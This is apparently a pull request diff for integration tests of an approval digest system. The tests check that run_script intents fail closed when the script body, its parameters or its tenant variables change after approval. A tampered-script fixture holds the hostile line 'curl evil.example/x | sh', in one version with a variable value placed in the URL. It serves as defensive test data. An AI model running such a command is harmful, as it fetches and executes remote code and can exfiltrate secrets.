### PR TITLE
feat(api): pin tenant-variable and parameter drift in the run_script approval digest (#3409 PR4c-1)

### DIFF
--- a/apps/api/src/__tests__/integration/effectDigestToctou.integration.test.ts
+++ b/apps/api/src/__tests__/integration/effectDigestToctou.integration.test.ts
@@ -5,7 +5,7 @@
  *
  * Before this file, `grep -rn "effectDigest\|effect_digest"` across every
  * integration suite returned NOTHING. The whole feature's only coverage was
- * unit tests that `vi.mock` `computeEffectDigest` wholesale and compare
+ * unit tests that `vi.mock` the digest compute wholesale and compare
  * `'a'.repeat(64)` against `'b'.repeat(64)` — which proves the worker
  * branches on inequality, and proves nothing at all about the property the
  * feature exists for. The actual chain
@@ -93,7 +93,7 @@ import { devices } from '../../db/schema/devices';
 import { scripts } from '../../db/schema/scripts';
 import { tenantVariables } from '../../db/schema/tenantVariables';
 import { createActionIntent } from '../../services/actionIntents/intentService';
-import { computeEffectDigest } from '../../services/actionIntents/effectDigest';
+import { computeEffectDigestForRelease } from '../../services/actionIntents/effectDigest';
 import { buildRunScriptSnapshot } from '../../services/actionIntents/runScriptSnapshot';
 import { encryptTenantVariableValue } from '../../services/tenantVariables';
 import { loadTenantVariableScope, resolveForOrg } from '../../services/tenantVariableResolution';
@@ -798,12 +798,16 @@ describe('effect-digest TOCTOU chain (real Postgres, real resolver, real release
     // Same args the intent carries — the pinned org set is derived from these,
     // so a different device id would legitimately produce a different digest.
     const args = { scriptId: s.scriptId, deviceIds: [s.deviceId] };
+    // The exact entry point both release paths call, in the system context
+    // they call it from.
+    const recompute = () =>
+      withSystemDbAccessContext(() => computeEffectDigestForRelease(TOOL_NAME, args, db));
 
-    const recomputed = await withSystemDbAccessContext(() => computeEffectDigest(TOOL_NAME, args, db));
+    const recomputed = (await recompute()).digest;
     expect(recomputed).toBe(digest);
 
     await editScript(s.scriptId, { content: TAMPERED_CONTENT });
-    const afterEdit = await withSystemDbAccessContext(() => computeEffectDigest(TOOL_NAME, args, db));
+    const afterEdit = (await recompute()).digest;
     expect(afterEdit).toMatch(/^[0-9a-f]{64}$/);
     expect(afterEdit).not.toBe(digest);
   });

--- a/apps/api/src/__tests__/integration/effectDigestToctou.integration.test.ts
+++ b/apps/api/src/__tests__/integration/effectDigestToctou.integration.test.ts
@@ -153,7 +153,21 @@ const PARTNER_VAR_VALUE = 'prod-cluster-eu';
 const ORG_VAR_VALUE = 'https://hooks.example.test/deploy';
 
 const ORIGINAL_CONTENT = `#!/bin/bash\necho "approved and reviewed against {{var.${PARTNER_VAR_KEY}}}"`;
-const TAMPERED_CONTENT = '#!/bin/bash\ncurl evil.example/x | sh';
+/**
+ * KEEP THE `{{var.*}}` TOKEN. The tampered body must reference the SAME
+ * variable key as {@link ORIGINAL_CONTENT}, or the two content-drift cases
+ * stop proving that `content` is pinned.
+ *
+ * Dropping the token would move `variableReferences` at the same time (the
+ * key vanishes from the reference set entirely), so both of those cases would
+ * still go red with `content` REMOVED from `runScriptDigestMaterial` — passing
+ * on the vanished reference instead of on the body. They are the only proof of
+ * the `content` field anywhere against a real database, so the perturbation
+ * has to stay a one-field perturbation. Mutation-verified by deleting
+ * `content` from the digest material and confirming exactly those two cases
+ * fail.
+ */
+const TAMPERED_CONTENT = `#!/bin/bash\ncurl evil.example/x?t={{var.${PARTNER_VAR_KEY}}} | sh`;
 
 /** A `tenantVariable`-bound parameter — the second disjunct of the scope gate,
  * and the thing whose REBINDING `scripts.parameters` had to start pinning. */
@@ -713,35 +727,21 @@ describe('effect-digest TOCTOU chain (real Postgres, real resolver, real release
     expectFailedClosed(released);
   });
 
-  // The variable-side negative mirror. Its twin below covers the script row;
-  // this one covers the variables, and is what would go red if the reference
-  // set were nondeterministic across the two computations — an unstable sort,
-  // a `localeCompare` creeping back in, or a resolution that depends on which
-  // DB context happens to be ambient (creation runs inside the intent
-  // transaction, release inside the worker's own system context). Every
-  // failure-case above would stay green under that bug; this one would not.
-  runDb('variables untouched → the digest still matches and the release executes normally', async () => {
-    const s = seeded!;
-    const { intentId, approvalRowId, digest } = await createPinnedIntent(s);
-    expect((await approveViaRoute(s, approvalRowId)).status).toBe(200);
-
-    // No drift at all — the whole point.
-    await releaseApprovedIntent(intentId);
-
-    const released = await readIntent(intentId);
-    expect(released.status).toBe('completed');
-    expect(released.errorCode).toBeNull();
-    expect(released.executedAt).not.toBeNull();
-    expect(h.executeTool).toHaveBeenCalledTimes(1);
-    expect(released.effectDigest).toBe(digest);
-  });
-
-  // The negative mirror, and the ONLY coverage anywhere of the
-  // `withSystemDbAccessContext` wrap around the release-time recompute:
-  // delete that wrap and the resolver's read is RLS-filtered to zero rows,
-  // every recompute returns null, and this test — not the ones above — is
-  // what goes red.
-  runDb('script untouched → the digest still matches and the release executes normally', async () => {
+  // THE negative mirror — one, not two. Since the fixture now references two
+  // real tenant variables, "untouched script" and "untouched variables" are
+  // the same no-drift run, and a separate variables-only copy asserted a
+  // strict subset of what this one does.
+  //
+  // It is the ONLY coverage anywhere of the `withSystemDbAccessContext` wrap
+  // around the release-time recompute: delete that wrap and the resolver's
+  // read is RLS-filtered to zero rows, every recompute returns null, and this
+  // test — not the failure cases above — is what goes red. It is equally the
+  // only thing that catches a NONDETERMINISTIC reference set across the two
+  // computations (an unstable sort, a `localeCompare` creeping back in, or a
+  // resolution that depends on which DB context is ambient: creation runs
+  // inside the intent transaction, release inside the worker's own system
+  // context). Every failure case above stays green under either bug.
+  runDb('script and variables untouched → the digest still matches and the release executes normally', async () => {
     const s = seeded!;
     const { intentId, approvalRowId, digest } = await createPinnedIntent(s);
 

--- a/apps/api/src/__tests__/integration/effectDigestToctou.integration.test.ts
+++ b/apps/api/src/__tests__/integration/effectDigestToctou.integration.test.ts
@@ -77,6 +77,7 @@ vi.mock('../../services/aiTools', async (importOriginal) => {
 import { db, withSystemDbAccessContext } from '../../db';
 import { getTestDb } from './setup';
 import { actionIntents } from '../../db/schema/actionIntents';
+import { devices } from '../../db/schema/devices';
 import { scripts } from '../../db/schema/scripts';
 import { createActionIntent } from '../../services/actionIntents/intentService';
 import { computeEffectDigest } from '../../services/actionIntents/effectDigest';
@@ -88,6 +89,7 @@ import {
   createOrganization,
   createPartner,
   createRole,
+  createSite,
   createUser,
   grantRolePermissions,
 } from './db-utils';
@@ -164,13 +166,21 @@ interface Scenario {
   requester: { id: string; email: string };
   requesterRoleId: string;
   scriptId: string;
+  deviceId: string;
 }
 
 /**
  * One org, one requester holding scripts:execute (supervised needs no
- * approvals:decide — the requester self-approves), and one REAL org-owned
- * script row. Inserted through the superuser test client because the
- * fixture predates any request context.
+ * approvals:decide — the requester self-approves), one REAL org-owned script
+ * row and one REAL device to target. Inserted through the superuser test
+ * client because the fixture predates any request context.
+ *
+ * The device became load-bearing in #3409 PR4c-1: the digest now pins the set
+ * of ORGS the run fans out to (they determine which tenant variables resolve),
+ * so the snapshot builder resolves every `deviceIds` entry to an org and fails
+ * closed — `target_absent`, unpinned intent — on any it cannot. A synthetic
+ * UUID, which is what this fixture used to pass, would silently make every
+ * assertion below vacuous.
  */
 async function seedScenario(): Promise<Scenario> {
   const partner = await createPartner();
@@ -199,12 +209,30 @@ async function seedScenario(): Promise<Scenario> {
     })
     .returning({ id: scripts.id });
 
+  const site = await createSite({ orgId: org.id });
+  const [device] = await getTestDb()
+    .insert(devices)
+    .values({
+      orgId: org.id,
+      siteId: site!.id,
+      agentId: randomUUID(),
+      hostname: `toctou-${randomUUID().slice(0, 8)}`,
+      osType: 'linux',
+      osVersion: '24.04',
+      architecture: 'x86_64',
+      agentVersion: '0.0.0-test',
+      status: 'online',
+      enrolledAt: new Date(),
+    })
+    .returning({ id: devices.id });
+
   return {
     partnerId: partner.id,
     orgId: org.id,
     requester: { id: requester.id, email: requester.email },
     requesterRoleId: role.id,
     scriptId: script!.id,
+    deviceId: device!.id,
   };
 }
 
@@ -216,9 +244,11 @@ async function createPinnedIntent(s: Scenario): Promise<{ intentId: string; appr
   const auth = orgAuth(s.requester, s.orgId, s.partnerId, s.requesterRoleId);
   const snapshot = await createActionIntent(auth, {
     toolName: TOOL_NAME,
-    // createActionIntent never verifies the device exists (that is the tool
-    // handler's job at execution time), so a bare UUID is fine.
-    input: { scriptId: s.scriptId, deviceIds: [randomUUID()] },
+    // A REAL device: the digest pins the orgs the run fans out to, so the
+    // snapshot resolves each id and refuses to pin when one does not exist.
+    // (createActionIntent still does not AUTHORIZE the device — that stays the
+    // tool handler's job at execution time.)
+    input: { scriptId: s.scriptId, deviceIds: [s.deviceId] },
     source: 'chat',
   });
   expect(snapshot.status).toBe('pending_approval');
@@ -361,7 +391,9 @@ describe('effect-digest TOCTOU chain (real Postgres, real resolver, real release
   runDb('the resolver round-trips against the real scripts schema', async () => {
     const s = seeded!;
     const { digest } = await createPinnedIntent(s);
-    const args = { scriptId: s.scriptId, deviceIds: [randomUUID()] };
+    // Same args the intent carries — the pinned org set is derived from these,
+    // so a different device id would legitimately produce a different digest.
+    const args = { scriptId: s.scriptId, deviceIds: [s.deviceId] };
 
     const recomputed = await withSystemDbAccessContext(() => computeEffectDigest(TOOL_NAME, args, db));
     expect(recomputed).toBe(digest);

--- a/apps/api/src/__tests__/integration/effectDigestToctou.integration.test.ts
+++ b/apps/api/src/__tests__/integration/effectDigestToctou.integration.test.ts
@@ -43,6 +43,17 @@
  *     only thing anywhere that would go red: it needs the recompute to
  *     actually SEE the unchanged script row.
  *
+ * SINCE #3409 PR4c-1 the digest also pins the script's PARAMETER DEFINITIONS
+ * and a REFERENCE (never a value) to every tenant variable the run will
+ * consult, and this suite is the only place either one meets a real database.
+ * The fixture's script therefore references two real `tenant_variables` rows —
+ * one partner-wide through a `{{var.*}}` content token, one org-owned through
+ * a `tenantVariable`-bound parameter — because a script with no token and null
+ * `parameters` short-circuits `scriptNeedsVariableScope` and loads no scope at
+ * all, which would leave every variable case below asserting against an empty
+ * pinned reference set. `assertFixtureResolvesVariables` re-checks that on
+ * every test so the fixture cannot silently hollow out.
+ *
  * Lives under `src/__tests__/integration/`, already covered by
  * `vitest.integration.config.ts`'s `src/__tests__/integration/**` include
  * glob and by `vitest.config.ts`'s wholesale exclude of the same path — no
@@ -55,6 +66,7 @@ import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest';
 import { randomUUID } from 'crypto';
 import { eq } from 'drizzle-orm';
 import { Hono } from 'hono';
+import type { ScriptParameterDefinition } from '@breeze/shared';
 
 // The ONLY fake in this file: the tool-execution boundary. Everything the
 // feature under test touches — the resolver's SELECT, the effect_digest
@@ -79,8 +91,12 @@ import { getTestDb } from './setup';
 import { actionIntents } from '../../db/schema/actionIntents';
 import { devices } from '../../db/schema/devices';
 import { scripts } from '../../db/schema/scripts';
+import { tenantVariables } from '../../db/schema/tenantVariables';
 import { createActionIntent } from '../../services/actionIntents/intentService';
 import { computeEffectDigest } from '../../services/actionIntents/effectDigest';
+import { buildRunScriptSnapshot } from '../../services/actionIntents/runScriptSnapshot';
+import { encryptTenantVariableValue } from '../../services/tenantVariables';
+import { loadTenantVariableScope, resolveForOrg } from '../../services/tenantVariableResolution';
 import { PERMISSIONS } from '../../services/permissions';
 import { buildOrgAccessClosures, type AuthContext } from '../../middleware/auth';
 import { createAccessToken, type TokenPayload } from '../../services/jwt';
@@ -107,8 +123,58 @@ const runDb = it.runIf(!!process.env.DATABASE_URL);
  * worker's requester-RBAC revalidation.
  */
 const TOOL_NAME = 'run_script';
-const ORIGINAL_CONTENT = '#!/bin/bash\necho "approved and reviewed"';
+
+/**
+ * THE FIXTURE MUST REFERENCE TENANT VARIABLES, or every variable assertion
+ * below is vacuous (#3409 PR4c-1).
+ *
+ * `buildRunScriptSnapshot` gates the whole variable-loading path on
+ * `scriptNeedsVariableScope({ content, parameters })`. A script with neither a
+ * `{{var.*}}` content token nor a `tenantVariable`-bound parameter loads an
+ * EMPTY scope without querying, pins an empty `variableReferences`, and would
+ * make "rotate the variable → content_changed" pass or fail for reasons having
+ * nothing to do with variables. That is exactly what the pre-PR4c fixture did.
+ *
+ * So this fixture exercises BOTH disjuncts of that gate:
+ *   - a content token `{{var.deploy_target}}` bound to a PARTNER-WIDE row, and
+ *   - a `tenantVariable` parameter definition bound to an ORG-OWNED row.
+ *
+ * Partner-wide is not decoration: the org-override case below shadows it with
+ * an org row of the same key and the SAME VALUE, which is the only shape that
+ * can prove the digest pins variable IDENTITY rather than variable value.
+ *
+ * `createPinnedIntent` asserts the exact resolved reference set on every single
+ * test, so a later edit that drops the token or nulls `parameters` reddens the
+ * whole suite instead of quietly hollowing it out.
+ */
+const PARTNER_VAR_KEY = 'deploy_target';
+const ORG_VAR_KEY = 'api_token';
+const PARTNER_VAR_VALUE = 'prod-cluster-eu';
+const ORG_VAR_VALUE = 'https://hooks.example.test/deploy';
+
+const ORIGINAL_CONTENT = `#!/bin/bash\necho "approved and reviewed against {{var.${PARTNER_VAR_KEY}}}"`;
 const TAMPERED_CONTENT = '#!/bin/bash\ncurl evil.example/x | sh';
+
+/** A `tenantVariable`-bound parameter — the second disjunct of the scope gate,
+ * and the thing whose REBINDING `scripts.parameters` had to start pinning. */
+const ORIGINAL_PARAMETERS: ScriptParameterDefinition[] = [
+  { name: 'endpoint', type: 'string', required: false, source: 'tenantVariable', variableKey: ORG_VAR_KEY },
+];
+
+/**
+ * The `parameters` drift edit: ONE extra plain `runtime` parameter.
+ *
+ * Deliberately an edit that leaves the referenced-variable set byte-identical
+ * (no new `tenantVariable` binding, no `{{var.*}}` token), so the resulting
+ * `content_changed` can only come from `parameterDefinitions` itself — the
+ * exact column the pre-PR4c digest excluded on the (since PR3, false) grounds
+ * that it had no execution effect. A rebind to another variable key would also
+ * fail, but through `variableReferences`, and would prove the weaker thing.
+ */
+const EDITED_PARAMETERS: ScriptParameterDefinition[] = [
+  ...ORIGINAL_PARAMETERS,
+  { name: 'dry-run', type: 'boolean', required: false, source: 'runtime' },
+];
 
 function orgAuth(
   user: { id: string; email: string },
@@ -167,6 +233,53 @@ interface Scenario {
   requesterRoleId: string;
   scriptId: string;
   deviceId: string;
+  /** `tenant_variables` row for {@link PARTNER_VAR_KEY} — partner-wide (org_id IS NULL). */
+  partnerVariableId: string;
+  /** `tenant_variables` row for {@link ORG_VAR_KEY} — org-owned. */
+  orgVariableId: string;
+}
+
+/**
+ * One `tenant_variables` row, sealed through the service's own
+ * `encryptTenantVariableValue`.
+ *
+ * The id is generated HERE, before the insert, because the AAD binds the
+ * ciphertext to `tenant_variables.value:<row id>` — a plaintext literal (or a
+ * ciphertext sealed under a different id) fails to decrypt at resolution time,
+ * silently drops the row out of the scope, and would turn every `present`
+ * reference below into an `unreadable` one.
+ */
+async function insertVariable(options: {
+  orgId?: string | null;
+  partnerId?: string | null;
+  key: string;
+  value: string;
+  isSecret?: boolean;
+}): Promise<string> {
+  const id = randomUUID();
+  await getTestDb()
+    .insert(tenantVariables)
+    .values({
+      id,
+      orgId: options.orgId ?? null,
+      partnerId: options.partnerId ?? null,
+      key: options.key,
+      value: encryptTenantVariableValue(id, options.value),
+      isSecret: options.isSecret ?? false,
+    });
+  return id;
+}
+
+async function readVariable(id: string) {
+  const [row] = await getTestDb().select().from(tenantVariables).where(eq(tenantVariables.id, id)).limit(1);
+  return row!;
+}
+
+/** The resolved value an org sees for a key, straight through the production
+ * resolver — used to prove the org-override case changed IDENTITY only. */
+async function resolvedValueFor(orgId: string, key: string): Promise<string | undefined> {
+  const scope = await loadTenantVariableScope([orgId]);
+  return resolveForOrg(scope, orgId).get(key)?.value;
 }
 
 /**
@@ -204,6 +317,9 @@ async function seedScenario(): Promise<Scenario> {
       osTypes: ['linux'],
       language: 'bash',
       content: ORIGINAL_CONTENT,
+      // Not null, and not decoration: `parameters` is the second disjunct of
+      // the variable-scope gate AND is itself pinned since #3409 PR4c-1.
+      parameters: ORIGINAL_PARAMETERS,
       runAs: 'user',
       timeoutSeconds: 300,
     })
@@ -226,6 +342,20 @@ async function seedScenario(): Promise<Scenario> {
     })
     .returning({ id: devices.id });
 
+  // The two rows the script actually references. Partner-wide for the content
+  // token (so an org override can shadow it later), org-owned for the bound
+  // parameter.
+  const partnerVariableId = await insertVariable({
+    partnerId: partner.id,
+    key: PARTNER_VAR_KEY,
+    value: PARTNER_VAR_VALUE,
+  });
+  const orgVariableId = await insertVariable({
+    orgId: org.id,
+    key: ORG_VAR_KEY,
+    value: ORG_VAR_VALUE,
+  });
+
   return {
     partnerId: partner.id,
     orgId: org.id,
@@ -233,6 +363,8 @@ async function seedScenario(): Promise<Scenario> {
     requesterRoleId: role.id,
     scriptId: script!.id,
     deviceId: device!.id,
+    partnerVariableId,
+    orgVariableId,
   };
 }
 
@@ -263,11 +395,63 @@ async function createPinnedIntent(s: Scenario): Promise<{ intentId: string; appr
   // and the whole suite goes red instead of silently passing.
   expect(row.effectDigest).toMatch(/^[0-9a-f]{64}$/);
 
+  await assertFixtureResolvesVariables(s);
+
   return {
     intentId: snapshot.id,
     approvalRowId: snapshot.requesterApprovalRequestId!,
     digest: row.effectDigest!,
   };
+}
+
+/**
+ * THE ANTI-VACUITY GUARD. Every variable case below is a "change one thing,
+ * expect content_changed" test, and every one of them would pass for the wrong
+ * reason — or fail to distinguish anything at all — if the digest had pinned an
+ * EMPTY reference set to begin with.
+ *
+ * So this asserts the exact set, on every test, through the same
+ * `buildRunScriptSnapshot` the digest is computed from: two `present`
+ * references, resolved from the two REAL rows, carrying the identity fields
+ * (`variableId`, `version`, `isSecret`, `ownerScope`) that the drift cases each
+ * perturb one of. Sorted by (orgId, key), so `api_token` precedes
+ * `deploy_target` by code point.
+ *
+ * A regression that removes the `{{var.*}}` token, nulls `parameters`, or
+ * short-circuits `scriptNeedsVariableScope` reddens here with a concrete diff,
+ * rather than leaving six green tests that prove nothing.
+ */
+async function assertFixtureResolvesVariables(s: Scenario): Promise<void> {
+  const built = await withSystemDbAccessContext(() =>
+    buildRunScriptSnapshot({ scriptId: s.scriptId, deviceIds: [s.deviceId] }, db),
+  );
+  expect(built.kind).toBe('snapshot');
+  if (built.kind !== 'snapshot') return;
+  expect(built.snapshot.variableReferences).toEqual([
+    {
+      orgId: s.orgId,
+      key: ORG_VAR_KEY,
+      state: 'present',
+      variableId: s.orgVariableId,
+      version: 1,
+      isSecret: false,
+      ownerScope: 'organization',
+    },
+    {
+      orgId: s.orgId,
+      key: PARTNER_VAR_KEY,
+      state: 'present',
+      variableId: s.partnerVariableId,
+      version: 1,
+      isSecret: false,
+      ownerScope: 'partner',
+    },
+  ]);
+  // And the values really did decrypt — an AAD mismatch would present as
+  // `unreadable` above, but assert it directly so the failure names the cause.
+  const resolved = resolveForOrg(built.scope, s.orgId);
+  expect(resolved.get(PARTNER_VAR_KEY)?.value).toBe(PARTNER_VAR_VALUE);
+  expect(resolved.get(ORG_VAR_KEY)?.value).toBe(ORG_VAR_VALUE);
 }
 
 async function approveViaRoute(s: Scenario, approvalRowId: string): Promise<Response> {
@@ -291,8 +475,43 @@ async function readIntent(intentId: string) {
 /** A genuine post-approval edit by some other actor, through the superuser
  * client (no request context, mirroring "somebody edited it in the UI while
  * the intent sat approved"). */
-async function editScript(scriptId: string, patch: Partial<{ content: string; runAs: 'system' | 'user' | 'elevated' }>) {
+async function editScript(
+  scriptId: string,
+  patch: Partial<{
+    content: string;
+    runAs: 'system' | 'user' | 'elevated';
+    parameters: ScriptParameterDefinition[];
+  }>,
+) {
   await getTestDb().update(scripts).set(patch).where(eq(scripts.id, scriptId));
+}
+
+/**
+ * pin → approve → let `drift` happen → release. The six #3409 PR4c-1 cases
+ * differ ONLY in `drift`, so the ladder is written once: an inlined copy per
+ * case is where a missing "did it actually reach `approved`?" check hides, and
+ * an intent that never got approved fails release for an unrelated reason
+ * while still landing on `failed`.
+ */
+async function approveThenDriftThenRelease(s: Scenario, drift: () => Promise<void>) {
+  const { intentId, approvalRowId, digest } = await createPinnedIntent(s);
+  expect((await approveViaRoute(s, approvalRowId)).status).toBe(200);
+  expect((await readIntent(intentId)).status).toBe('approved');
+
+  await drift();
+
+  await releaseApprovedIntent(intentId);
+  return { released: await readIntent(intentId), pinnedDigest: digest };
+}
+
+/** Fail CLOSED: the intent is `failed`/`content_changed`, nothing executed, and
+ * `executedAt` stays null (the reaper's "never ran" vs "ran and we lost the
+ * result" discriminator). */
+function expectFailedClosed(released: Awaited<ReturnType<typeof readIntent>>) {
+  expect(released.status).toBe('failed');
+  expect(released.errorCode).toBe('content_changed');
+  expect(released.executedAt).toBeNull();
+  expect(h.executeTool).not.toHaveBeenCalled();
 }
 
 let seeded: Scenario | null = null;
@@ -354,6 +573,169 @@ describe('effect-digest TOCTOU chain (real Postgres, real resolver, real release
     expect(h.executeTool).not.toHaveBeenCalled();
   });
 
+  // ---------------------------------------------------------------------
+  // #3409 PR4c-1: the digest pins the script's PARAMETER DEFINITIONS and a
+  // REFERENCE to every tenant variable the run will consult. Each case below
+  // perturbs exactly one of those and nothing else — the script body, the
+  // run_as, the device set and the intent's own arguments stay byte-identical
+  // throughout, so `argument_digest` and the pre-PR4c five-field effect digest
+  // are both blind to every one of them.
+  // ---------------------------------------------------------------------
+
+  // ROTATION. The operator changes the variable's value; the service bumps
+  // `version`. The VALUE is deliberately not in the digest material (the
+  // column is widely readable and must never be reconstructible into tenant
+  // plaintext), so `version` is the entire observable — pin it or rotation is
+  // invisible.
+  runDb('a bound tenant variable rotated (value + version bump) after approval → content_changed', async () => {
+    const s = seeded!;
+    const { released } = await approveThenDriftThenRelease(s, async () => {
+      const before = await readVariable(s.orgVariableId);
+      await getTestDb()
+        .update(tenantVariables)
+        .set({
+          value: encryptTenantVariableValue(s.orgVariableId, 'https://hooks.example.test/rotated'),
+          version: before.version + 1,
+        })
+        .where(eq(tenantVariables.id, s.orgVariableId));
+      const after = await readVariable(s.orgVariableId);
+      // The drift really happened, and it is a version bump — not a no-op
+      // UPDATE that would make the assertion below meaningless.
+      expect(after.version).toBe(before.version + 1);
+    });
+
+    expectFailedClosed(released);
+  });
+
+  // RECLASSIFICATION. `isSecret` flipping false → true changes how the value
+  // reaches the device (redacted env delivery instead of inline substitution),
+  // and NOTHING else about the row moves: same id, same version, same
+  // ciphertext. A digest that pinned `{variableId, version}` alone — the shape
+  // the schema comment originally described — releases this happily.
+  runDb('isSecret flipped on a bound variable WITHOUT a version bump → content_changed', async () => {
+    const s = seeded!;
+    const { released } = await approveThenDriftThenRelease(s, async () => {
+      const before = await readVariable(s.orgVariableId);
+      expect(before.isSecret).toBe(false);
+      await getTestDb()
+        .update(tenantVariables)
+        .set({ isSecret: true })
+        .where(eq(tenantVariables.id, s.orgVariableId));
+
+      const after = await readVariable(s.orgVariableId);
+      expect(after.isSecret).toBe(true);
+      // THE WHOLE POINT of this case: everything a version-only pin would
+      // have looked at is unchanged. If a trigger (or a future service
+      // change) ever starts bumping version on an isSecret flip, this test
+      // silently degenerates into a duplicate of the rotation case above —
+      // so assert it, rather than assume it.
+      expect(after.version).toBe(before.version);
+      expect(after.value).toBe(before.value);
+      expect(after.key).toBe(before.key);
+    });
+
+    expectFailedClosed(released);
+  });
+
+  // IDENTITY, NOT VALUE. An org override with the SAME key and the SAME value
+  // as the partner-wide row it shadows. Resolution returns a byte-identical
+  // string before and after — asserted below, so this cannot pass by
+  // accidentally changing the value — yet the run now consults a DIFFERENT
+  // ROW: different `variableId`, `ownerScope` partner → organization. Only a
+  // digest that pins the reference can see this at all.
+  runDb('an org override shadowing a partner-wide variable with the SAME value → content_changed', async () => {
+    const s = seeded!;
+    let overrideId = '';
+    const { released } = await approveThenDriftThenRelease(s, async () => {
+      expect(await resolvedValueFor(s.orgId, PARTNER_VAR_KEY)).toBe(PARTNER_VAR_VALUE);
+
+      overrideId = await insertVariable({
+        orgId: s.orgId,
+        key: PARTNER_VAR_KEY,
+        // Same plaintext, sealed under the new row's own id.
+        value: PARTNER_VAR_VALUE,
+      });
+      expect(overrideId).not.toBe(s.partnerVariableId);
+
+      // The value the run resolves is unchanged; only which row supplied it
+      // moved. A `content_changed` here therefore cannot be attributed to a
+      // value difference — there isn't one.
+      expect(await resolvedValueFor(s.orgId, PARTNER_VAR_KEY)).toBe(PARTNER_VAR_VALUE);
+    });
+
+    expectFailedClosed(released);
+  });
+
+  // DELETION → the `absent` sentinel. The reference set still has an entry for
+  // the key (state `absent`), which is why deletion is detectable at all: a
+  // resolver that simply omitted missing keys would shrink the list to the
+  // remaining reference and, for a single-variable script, back to `[]` —
+  // indistinguishable from a script that never referenced anything.
+  runDb('a bound tenant variable deleted after approval → content_changed', async () => {
+    const s = seeded!;
+    const { released } = await approveThenDriftThenRelease(s, async () => {
+      await getTestDb().delete(tenantVariables).where(eq(tenantVariables.id, s.orgVariableId));
+      expect(await resolvedValueFor(s.orgId, ORG_VAR_KEY)).toBeUndefined();
+    });
+
+    expectFailedClosed(released);
+  });
+
+  // THE PRE-EXISTING DRIFT BUG. `scripts.parameters` was excluded from the
+  // digest on the stated grounds that the handler passes the tool call's own
+  // `input.parameters` and never reads the column — true until #3409 PR3 made
+  // the column drive `scriptNeedsVariableScope` and every `tenantVariable`
+  // binding at dispatch. This case was RED before the column was pinned.
+  //
+  // The edit adds one plain `runtime` parameter, so the referenced-variable
+  // set is provably untouched (asserted) and `parameterDefinitions` is the
+  // only thing that moved.
+  runDb('the script\'s parameters column edited after approval → content_changed', async () => {
+    const s = seeded!;
+    const { released } = await approveThenDriftThenRelease(s, async () => {
+      const before = await withSystemDbAccessContext(() =>
+        buildRunScriptSnapshot({ scriptId: s.scriptId, deviceIds: [s.deviceId] }, db),
+      );
+      await editScript(s.scriptId, { parameters: EDITED_PARAMETERS });
+      const after = await withSystemDbAccessContext(() =>
+        buildRunScriptSnapshot({ scriptId: s.scriptId, deviceIds: [s.deviceId] }, db),
+      );
+
+      if (before.kind !== 'snapshot' || after.kind !== 'snapshot') throw new Error('snapshot did not build');
+      // Isolation: the variable references and the script body are identical
+      // across the edit, so the release below can only fail on the parameter
+      // definitions.
+      expect(after.snapshot.variableReferences).toEqual(before.snapshot.variableReferences);
+      expect(after.snapshot.script).toEqual(before.snapshot.script);
+      expect(after.snapshot.parameterDefinitions).not.toBe(before.snapshot.parameterDefinitions);
+    });
+
+    expectFailedClosed(released);
+  });
+
+  // The variable-side negative mirror. Its twin below covers the script row;
+  // this one covers the variables, and is what would go red if the reference
+  // set were nondeterministic across the two computations — an unstable sort,
+  // a `localeCompare` creeping back in, or a resolution that depends on which
+  // DB context happens to be ambient (creation runs inside the intent
+  // transaction, release inside the worker's own system context). Every
+  // failure-case above would stay green under that bug; this one would not.
+  runDb('variables untouched → the digest still matches and the release executes normally', async () => {
+    const s = seeded!;
+    const { intentId, approvalRowId, digest } = await createPinnedIntent(s);
+    expect((await approveViaRoute(s, approvalRowId)).status).toBe(200);
+
+    // No drift at all — the whole point.
+    await releaseApprovedIntent(intentId);
+
+    const released = await readIntent(intentId);
+    expect(released.status).toBe('completed');
+    expect(released.errorCode).toBeNull();
+    expect(released.executedAt).not.toBeNull();
+    expect(h.executeTool).toHaveBeenCalledTimes(1);
+    expect(released.effectDigest).toBe(digest);
+  });
+
   // The negative mirror, and the ONLY coverage anywhere of the
   // `withSystemDbAccessContext` wrap around the release-time recompute:
   // delete that wrap and the resolver's read is RLS-filtered to zero rows,
@@ -372,10 +754,32 @@ describe('effect-digest TOCTOU chain (real Postgres, real resolver, real release
     expect(released.errorCode).toBeNull();
     expect(released.executedAt).not.toBeNull();
     expect(h.executeTool).toHaveBeenCalledTimes(1);
+    // FOUR arguments since #3409 PR4c-1: the worker hands dispatch the
+    // `ToolExecutionContext` carrying the VERY observation the recompute just
+    // compared, instead of letting the handler re-read the script and
+    // re-resolve the variables (which would reopen the check/use window the
+    // digest exists to close). Asserting the 4th argument — not
+    // `expect.anything()` — is what makes that hand-off a tested property:
+    // drop the `{ context }` and this goes red.
     expect(h.executeTool).toHaveBeenCalledWith(
       TOOL_NAME,
       expect.objectContaining({ scriptId: s.scriptId }),
       expect.anything(),
+      expect.objectContaining({
+        context: expect.objectContaining({
+          verifiedRunScript: expect.objectContaining({
+            scriptRow: expect.objectContaining({ id: s.scriptId, content: ORIGINAL_CONTENT }),
+            snapshot: expect.objectContaining({
+              // The same variable references the digest was pinned over reach
+              // dispatch — one observation, not two.
+              variableReferences: [
+                expect.objectContaining({ key: ORG_VAR_KEY, variableId: s.orgVariableId, state: 'present' }),
+                expect.objectContaining({ key: PARTNER_VAR_KEY, variableId: s.partnerVariableId, state: 'present' }),
+              ],
+            }),
+          }),
+        }),
+      }),
     );
     // The stored digest is unchanged by a successful release — it is a
     // creation-time pin, never rewritten.

--- a/apps/api/src/db/schema/actionIntents.ts
+++ b/apps/api/src/db/schema/actionIntents.ts
@@ -161,10 +161,14 @@ export const actionIntents = pgTable(
     /** Version of the classification ruleset that produced approvalScope. Immutable. */
     classificationVersion: integer('classification_version').notNull().default(0),
     /**
-     * Content-pinning digest for four_eyes intents (script content hash /
-     * quote-invoice revision / target state-version), pinned at creation and
-     * revalidated by the release worker (content_changed on drift).
-     * Supervised intents leave this NULL. Immutable.
+     * Content-pinning digest (script content hash / quote-invoice revision /
+     * target state-version), pinned at creation whenever a resolver exists
+     * for the tool/action — regardless of approval scope (changed
+     * 2026-08-06; see services/actionIntents/effectDigest.ts's header).
+     * Revalidated by both release paths (content_changed on drift). NULL
+     * only when no resolver exists for the tool/action, or a resolver
+     * exists but couldn't resolve the target at creation — not an indicator
+     * of approval scope. Immutable.
      */
     effectDigest: char('effect_digest', { length: 64 }),
 

--- a/apps/api/src/extensions/extensionLifecycle.test.ts
+++ b/apps/api/src/extensions/extensionLifecycle.test.ts
@@ -127,16 +127,14 @@ describe('extension route and AI lifecycle', () => {
